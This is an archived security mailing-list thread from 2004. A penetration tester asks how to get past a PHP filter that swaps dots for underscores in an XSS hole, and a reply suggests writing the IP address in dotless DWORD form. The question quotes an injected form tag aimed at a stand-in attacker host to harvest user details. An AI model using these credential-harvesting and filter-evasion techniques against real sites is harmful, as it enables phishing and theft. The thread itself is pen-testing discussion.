mailing list archives
RE: Fullstop Substitution in XSS
From: "Harry Metcalfe" <harry () slaptop com>
Date: Tue, 1 Jun 2004 03:13:46 +0100
Yes: Don't use a . in the target. You can specify an IP address in DWORD
form, which has no periods. See the following page for a good description:
It should be noted that this will not work in all browsers, and thus if the
client's browser does not support this IP address notation, they will be
invulnerable. Many browsers do support it though - Firefox being among them.
I think IE5 does also. I have IE6 here and it doesn't work with that.
From: Calum Power [mailto:enune () fribble net]
Sent: 29 May 2004 05:49
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS
As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">
Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).
Any help would be appreciated.
enune () fribble net